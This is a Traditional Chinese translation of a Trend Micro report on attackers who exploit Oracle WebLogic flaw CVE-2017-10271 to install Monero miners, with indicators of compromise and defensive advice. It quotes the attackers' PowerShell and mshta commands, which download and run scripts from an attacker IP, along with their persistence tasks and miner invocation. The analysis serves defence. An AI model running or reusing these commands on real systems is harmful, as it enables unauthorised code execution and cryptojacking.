Oracle 伺服器漏洞遭駭客用來散布門羅幣 (Monero) 挖礦程式

加密虛擬貨幣突然爆紅,已經讓資安威脅情勢大為改觀。網路犯罪集團開始調整其人力和資源,將加密虛擬貨幣定為優先要務,包括直接竊取比特幣錢包或入侵網路和裝置並用於挖礦。歹徒看上加密虛擬貨幣其實已不是新聞,勒索病毒駭客集團多年來一直偏愛 比特幣 Bitcoin 為其勒索贖金的管道。不過,趨勢科技從 2017 年 10 月下旬開始在一些行動裝置應用程式商店看到手機挖礦惡意程式,到了 2017 年 12 月,Digmine 加密虛擬貨幣挖礦程式開始藉由社群媒體即時通訊散布

而現在,駭客正利用一個已經修補的 Oracle WebLogic WLS-WSAT 漏洞 (也就是可讓駭客從遠端執行程式碼的  CVE-2017-10271 漏洞) 來散布兩個加密虛擬貨幣挖礦程式,分別是 64 位元和 32 位元的 XMRig 門羅幣挖礦程式。兩個版本分別對應不同版本的 Windows 作業系統。「圖 1」顯示此漏洞攻擊程式碼仍在開發當中。此份報告所分析的是最新版本的惡意程式。

惡意程式新舊版本比較 (左側為新版本,右側為舊版),新版多了一個新元件 (紅框標示處)。
圖 1:惡意程式新舊版本比較 (左側為新版本,右側為舊版),新版多了一個新元件 (紅框標示處)。

漏洞攻擊在系統植入兩個挖礦程式

至截稿為止,趨勢科技發現駭客會利用 CVE-2017-10271 漏洞在系統上植入趨勢科技命名為「Coinminer_MALXMR.JL-PS」的挖礦程式。受感染的系統上會有兩個門羅幣挖礦程式。

Figure 2. How the payload of the exploit may look like (executes Coinminer_MALXMR.JL-PS)

圖 2:漏洞攻擊在系統上植入挖礦程式 Coinminer_MALXMR.JL-PS。

Coinminer_MALXMR.JL-PS 一旦執行,就會下載三個檔案到系統上:一個挖礦元件「javaupd.exe」(趨勢科技命名為:Coinminer_TOOLXMR.JL-WIN64)、一個開機自動執行元件「startup.cmd」(趨勢科技命名為:Coinminer_MALXMR.JL-BAT) 以及另一個惡意程式「3.exe」(趨勢科技命名為:Coinminer_MALXMR.JLT-WIN32)。

根據我們的分析,駭客會依照 Windows 作業系統的版本而執行不同挖礦程式。第一個挖礦程式是 64 位元程式,因此只會在 64 位元 Windows 上執行。如果在 32 位元的 Windows 系統,則會執行另一個挖礦程式。

雙重對應版本擴大受害裝置數量

感染的過程首先會在系統上安裝一個開機自動執行元件。至截稿為止,其作法是將前述的「startup.cmd」複製到系統的「啟動」(Startup) 資料夾。如此一來,這個 .cmd 檔案就會在系統開機時自動啟動並執行「mshta http://107.181.174.248/web/p.hta」這道指令,進而啟動 Powershell 程式,其完整參數如下:

cmd /c powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString(‘http://107.181.174.248/web/check.ps1’))

惡意程式會在系統上建立兩個不同排程工作:

  1. 第一個工作會試圖下載挖礦程式,然後不斷重複執行該程式。一個排程工作名為「Oracle Java update」,會執行「Mshta http://107.181.174.248/web/p.hta」這道指令。它每 80 分鐘執行一次,流程跟 startup.cmd 的做法一樣。
  2. 另一個排程工作名為「Oracle Java」,它每天執行一次,負責中止第一個挖礦程式。它會執行以下指令:
  • cmd /c taskkill /im powershell.exe /f
  • cmd /c taskkill /im javaupd.exe /f
  • cmd /c taskkill /im msta.exe /f (這道指令我們懷疑駭客可能搞錯了,它應該執行「exe」才對)

在產生上述排程工作之後,Coinminer_MALXMR.JL-PS 接著會執行挖礦程式「javaupd.exe」來開始進行挖礦作業,其指令如下:

cmd.exe /c C:\ProgramData\javaupd.exe -o eu.minerpool.pw:65333 -u {Computer Name}

系統的效能會因為挖礦作業而下降。

第二個惡意程式「3.exe」會先檢查系統是 32 位元或 64 位元版本。如果是 32 位元版本,就會下載並執行一個名為「LogonUI.exe」的程式 (趨勢科技命名為 COINMINER_MALXMR.JL-WIN32)。 如果前述第一個 64 位元的挖礦程式未在執行當中,LogonUI.exe 會下載一個 .DLL 檔案 (趨勢科技命名為:COINMINER_MALXMR.FD-WIN32),該檔案接著會執行第二個挖礦程式「sqlservr.exe」(趨勢科技命名為:COINMINER_TOOLXMR.JL-WIN32)。

第二個挖礦程式是專門針對 32 位元 Windows 而設計,當第一個挖礦程式無法執行時,就會執行這個程式。此外,它還具備開機自動啟動功能,而且會建立排程工作讓他每天都會自動執行:

  1. LogonUI 會註冊成一個系統服務。
  2. 服務名稱為「Microsoft Telemetry」。
  3. 它會建立排程工作來每天執行一次「Microsoft Telemetry」服務。挖礦程式執行流程

圖 3:挖礦程式執行流程。

挖礦程式通常會盡可能感染越多裝置,因為不論任何加密虛擬貨幣都需要大量的運算資源才能有效開採。藉由雙挖礦程式及開機自動啟動與每日執行一次的機制,駭客就能盡可能擴大感染的裝置數量以利於挖礦。

除此之外,這個挖礦程式還會試圖關閉其他惡意程式來讓它擁有更多運算資源可用。它會中止「spoosvc.exe」程式並刪除「Spooler SubSystem Service」排程工作,這是另一個趨勢科技命名為「TROJ_DLOADR.AUSUHI」的加密虛擬貨幣挖礦程式。

對使用者的影響與反制之道

此惡意程式會利用電腦的中央處理器 (CPU) 和繪圖晶片 (GPU) 來進行挖礦,因此系統會變得異常緩慢。使用者一開始可能不會懷疑自己的電腦是因為感染惡意程式才變慢,因為還有其他因素也會造成系統變慢。不過,正如我們所說,加密虛擬貨幣挖礦惡意程式從 2017 年中期便開始出現,預料往後還會有更多類似的變種出現。網路犯罪集團總是不放過任何機會,並且不斷試驗新的方法來入侵使用者的系統。

定期修補並更新軟體可有效防範加密虛擬貨幣採礦程式及其他專門利用系統漏洞的威脅 (本案例的漏洞早在 2017 年 10 月廠商即已修補)。IT 系統管理員和資安人員也可考慮採用一套應用程式白名單或類似的安全機制,如此可避免一些可疑程式執行或安裝。此外,主動監控網路流量也有助於發現惡意程式的感染徵兆。趨勢科技HYPERLINK “http://www.trendmicro.tw/tw/business/complete-software-protection/index.html” Smart Protection SuitesWorry-Free Pro皆能保護使用者與企業並偵測及攔截上述惡意檔案與相關網址。趨勢科技HYPERLINK “http://www.trendmicro.tw/tw/business/complete-software-protection/index.html” Smart Protection Suites更具備高準度機器學習、網站信譽評等、行為監控、應用程式控管等功能,可有效防範此一加密虛擬貨幣挖礦程式及其它威脅。

除此之外,趨勢科技 趨勢科技的Deep Discovery Inspector 也可利用以下 DDI 規則來保護客戶:

  • DDI Rule ID 2600:CVE-2017-10271 – Oracle Weblogic Exploit – HTTP (Request)

入侵指標資料

SHA256 雜湊碼 趨勢科技命名
28e9f5d3768cdccbd886b37964f17754c8b1875c588ced775849a0874e8c2375 Coinminer_MALXMR.FD-WIN64
4b2f0e3165090121e4029908d552a8c559e1b3ee0bb3e679830b5bf91f0ab796 Coinminer_MALXMR.JLT-WIN32
55221771041707c190ddfe322301876a432eb4a5d23888bf150864bcd1c7e709 Coinminer_MALXMR.FD-WIN32
7ecee91336977c324d5b74e3900de36a356702acc526f3b684d599f931bde47b Coinminer_MALXMR.JL-BAT
8a01dc99ac4e197c9c238ad33c3259c1ee124e5f8b5514766af45f29cf299653 Coinminer_MALXMR.JT-PS
9d08c4c50c8fc0efab2ca749b86292077f51f4a157e6ac02ecacf282c5da28eb Coinminer_TOOLXMR.JL-WIN32
bab77860c4d7ccbdfc4f546ea348f68ae05c6e18c5a8f88460d09712138f5b88 Coinminer_MALXMR.JL-PS
d3f0b7b903d7879d0ef1c39c423d2a04dfd61f407dc1844446d7395e033c75ab Coinminer_MALXMR.JL-WIN64
d7cf45c50a201199d5e1c3fca8338ad369ef1e8db9efcb8004210d4f06217e25 Coinminer_TOOLXMR.JL-WIN64
dc71b4e84d39407892e700bda587abf1c921563aaa3fddd074225f5a1068f8bc Coinminer_MALXMR.JL-PS
e390c72b226c7a6d7443074a9ccd54cf4ccf8acd68eea20da8f8a1dfd57a652d Coinminer_MALXMR.JL-WIN32
f05721fc5a4686fef1ea1a82a9065f530ce96aaa693bd00088b67d89606de9c4 Coinminer_TOOLXMR.JL-WIN64

 

網址 目的
http://107.181.174.248/web/2.ps1 漏洞攻擊當中所用到的惡意檔案。
http://107.181.174.248/web/javaupd.exe 用於下載檔案。
http://107.181.174.248/web/startup.cmd 用於下載檔案。
http://107.181.174.248/z.exe 用於下載檔案。
http://107.181.174.248/panelnew/BotLoaderx32.exe 用於下載檔案。
http://107.181.174.248/panelnew/BotLoaderx64.exe 用於下載檔案。
http://107.181.174.248/panelnew/MainModulex32.dll 用於下載檔案。
http://107.181.174.248/panelnew/MainModulex64.dll 用於下載檔案。
http://107.181.174.248/123/2.exe 用於下載檔案。
http://107.181.174.248/web/p.hta 用於開機自動執行。
http://107.181.174.248/web/kil.hta 用於開機自動執行。
http://107.181.174.248/web/p.hta 用於開機自動執行。
http://107.181.174.248/web/check.ps1 用於開機自動執行。
http://107.181.174.248/web/p.hta 用於開機自動執行。
http://zxcvb.pw/api/bot/getSettings.php 用於取得組態設定。
http://107.181.174.248/panelnew/BotLoaderx32.exe getSettings.php 當中的連結。
http://107.181.174.248/panelnew/BotLoaderx64.exe getSettings.php 當中的連結。
http://107.181.174.248/panelnew/MainModulex32.dll getSettings.php 當中的連結。
http://107.181.174.248/panelnew/MainModulex64.dll getSettings.php 當中的連結。

 

原文出處:Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads 作者:Johnlery Triunfante 和 Mark Vicente